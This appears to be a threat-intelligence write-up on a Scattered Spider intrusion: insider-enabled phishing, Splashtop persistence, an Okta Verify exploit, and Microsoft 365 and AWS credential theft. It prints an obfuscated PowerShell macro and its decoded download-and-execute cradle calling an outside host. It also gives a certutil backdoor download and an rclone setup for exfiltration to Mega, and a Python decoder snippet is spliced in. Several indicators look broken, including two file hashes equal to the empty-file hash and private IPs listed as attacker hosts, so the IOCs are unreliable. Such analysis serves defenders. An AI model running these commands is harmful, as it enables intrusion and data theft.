
Scattered Spider from Insider Approved Phishing to Cloud Exfiltration While Living off the Land

Spida Killa Labs analyzed an attack that leverages insiders to provide access to cloud services using living-off-the-land tools.

The attack, linked to the Scattered Spider threat actor, begins with the recruitment of a key insider positioned to facilitate the attack while attempting to blend in with regular activities. Once Scattered Spider has made contact with the insider, the insider is offered 1 BTC (69,644.70 USD) to click on a designated link, which will arrive via a pre-arranged phishing email.


Clicking on this link will install a version of the Splashtop Remote Monitoring and Management (RMM) software, giving Scattered Spider continuous access to the victim network as the insider. The attacker used this installation of Splashtop to move laterally via all RDP sessions and shared drives observed over the 37-day reconnaissance phase. As new endpoints are compromised, Splashtop is installed on each to maintain access.

 

As new endpoints are compromised, an arbitrary code execution vulnerability in Okta Verify (CVE-2024-0980) was used to obtain system access on each endpoint.

 

A second method of lateral movement was observed in which the attacker modified Excel files on shared drives to execute a macro that yields further access. This macro would execute the following PowerShell:

 

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreAAA8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKAAADgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCwDgTreJwBBDgTreGQDgTreZDgTreBJDgTreG4DgTreUDgTreByDgTreG8DgTreYwBlDgTreHMDgTrecwDgTrezDgTreDIDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"

 

Which decodes to:

 

Powershell.exe -noexit $c1=(New-ObjectNet.We;

$c4=bClient).Downlo;

$c3=adString(http://185.7.214[.]7/PP91.PNG);

$JI=($c1,$c4,$c3 -Join);

I`E`X$JI|I`E`X”
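The wrapper shown above (a Base64 blob with a marker string substituted for one character, decoded as UTF-16LE) can be unwrapped statically during triage without running the command. The following is an added example, not code from the original analysis; the function names and the benign sample stage are constructed for illustration, and it assumes a command line of the same shape as the one above: a single-quoted blob, one or more .replace() calls, and Frombase64string.

```python
import base64
import re

# Single-quoted blob assigned to a variable:  $name = '....'
BLOB_RE = re.compile(r"\$\w+\s*=\s*'([^']{16,})'")
# Marker substitution applied before decoding:  .replace('marker','char')
REPLACE_RE = re.compile(r"\.replace\(\s*'([^']+)'\s*,\s*'([^']*)'\s*\)", re.I)


def decode_stage(command_line):
    """Return the decoded PowerShell stage, or None if the pattern is absent."""
    blob = BLOB_RE.search(command_line)
    if not blob or "frombase64string" not in command_line.lower():
        return None
    data = blob.group(1)
    # Undo each marker substitution in the order the command applies them.
    for marker, char in REPLACE_RE.findall(command_line):
        data = data.replace(marker, char)
    data += "=" * (-len(data) % 4)  # tolerate stripped padding
    try:
        raw = base64.b64decode(data, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    # [Text.Encoding]::Unicode in .NET is UTF-16LE.
    return raw.decode("utf-16-le", errors="replace")


def build_sample(stage, marker="DgTre"):
    """Constructed test input in the page's command-line shape (benign stage)."""
    b64 = base64.b64encode(stage.encode("utf-16-le")).decode().replace("A", marker)
    return ("powershell.exe -command \"$codigo = '" + b64 + "';"
            "$x = [system.Text.encoding]::Unicode.GetString("
            "[system.convert]::Frombase64string( $codigo.replace('"
            + marker + "','A') ));"
            "powershell.exe -windowstyle hidden -executionpolicy bypass "
            "-Noprofile -command $x\"")


if __name__ == "__main__":
    sample = build_sample("Write-Output 'constructed benign stage'")
    print(decode_stage(sample))
```

The same regular expressions can be run over process-creation command lines to flag any PowerShell invocation that pairs a .replace() call with Frombase64string.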

 

While PP91.PNG (2166c66f90ef87f21dc4f2b48f2b47ec3b401caca1ad068c2093fff713ef73bc), downloaded by the previous stage, has the image file extension .PNG, it is in fact another PowerShell script, this time without obfuscation.

 

The PowerShell in PP91.PNG will download a backdoor via certutil.exe.

 

certutil.exe -urlcache -f http://10.0.0[.]5/ssd.dll C:\Users\Public\Documents\ssd.dll

and save it to C:\Users\Public\Documents\ssd.dll (63996a39755e84ee8b5d3f47296991362a17afaaccf2ac43207a424a366f4cc9).

 

Each compromised endpoint will have its Microsoft 365 tokens dumped by OfficeMemScraper.ps1 and exfiltrated. AWS credential files are also exfiltrated.

 

The attacker enumerates the endpoint for all other files of importance using a script called cr0wnj3welz.ps1. The files this script identifies as important are exfiltrated to Mega[.]io using rclone.exe, which has been renamed to dumper.exe.

 

c:\Windows\system32\cmd.exe /C C:\Users\barne\dumper.exe config create remote mega user [redacted]@gmail.com pass [redacted]

 

The attacker then sets the Microsoft 365 SharePoint and OneDrive sharing of all files to “Anyone” to grant themselves access.

 

The attacker is then known to download these files from 192.168.1[.]1 and 10.0.0[.]1.  

 

IOCs

Filename | SHA256
C:\Users\Public\Documents\ssd.dll | 63996a39755e84ee8b5d3f47296991362a17afaaccf2ac43207a424a366f4cc9
PP91.PNG | 2166c66f90ef87f21dc4f2b48f2b47ec3b401caca1ad068c2093fff713ef73bc
OfficeMemScraper.ps1 |
C:\Users\<USERNAME>\.aws\credentials | Varies
C:\Program Files (x86)\Okta\UpdateService\wintrust.dll | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
New_order.pdf | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

Addresses Used

185.7.214[.]7

192.168.1[.]1

10.0.0[.]1

10.0.0[.]5
